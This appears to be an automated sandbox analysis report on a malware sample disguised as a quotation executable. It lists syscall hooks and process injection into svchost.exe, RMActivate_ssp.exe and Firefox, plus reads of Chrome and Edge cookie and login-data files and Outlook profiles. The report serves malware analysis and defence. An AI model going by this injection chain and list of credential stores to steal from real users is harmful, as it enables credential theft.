Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h] 1_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h] 1_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h] 1_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h] 1_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h] 1_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h] 1_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h] 1_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h] 1_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h] 1_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B892A mov eax, dword ptr fs:[00000030h] 1_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C892B mov eax, dword ptr fs:[00000030h] 1_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h] 1_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904940 mov eax, dword ptr fs:[00000030h] 1_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h] 1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h] 1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h] 1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h] 1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E mov edx, dword ptr fs:[00000030h] 1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h] 1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h] 1_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h] 1_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h] 1_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830887 mov eax, dword ptr fs:[00000030h] 1_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h] 1_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h] 1_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h] 1_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h] 1_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h] 1_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h] 1_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h] 1_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h] 1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h] 1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h] 1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h] 1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h] 1_2_03852835
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_009681F7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0093A395
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093A364 SetUnhandledExceptionFilter, 0_2_0093A364

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtOpenKeyEx: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQueryValueKey: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread register set: target process: 3992 Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread APC queued: target process: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: B2A008 Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00968C93 LogonUserW, 0_2_00968C93
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00913B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00913B4C
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00914A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00914A35
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00974EC9 mouse_event, 0_2_00974EC9
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe" Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_009681F7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00974C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00974C03
Source: PTT Group project - Quotation.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PTT Group project - Quotation.exe, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088336332.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088336332.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088336332.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0093886B cpuid 0_2_0093886B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_009450D7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00952230 GetUserNameW, 0_2_00952230
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0094418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_0094418A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00914AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00914AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: PTT Group project - Quotation.exe Binary or memory string: WIN_81
Source: PTT Group project - Quotation.exe Binary or memory string: WIN_XP
Source: PTT Group project - Quotation.exe Binary or memory string: WIN_XPe
Source: PTT Group project - Quotation.exe Binary or memory string: WIN_VISTA
Source: PTT Group project - Quotation.exe Binary or memory string: WIN_7
Source: PTT Group project - Quotation.exe Binary or memory string: WIN_8
Source: PTT Group project - Quotation.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00986596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00986596
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00986A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00986A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs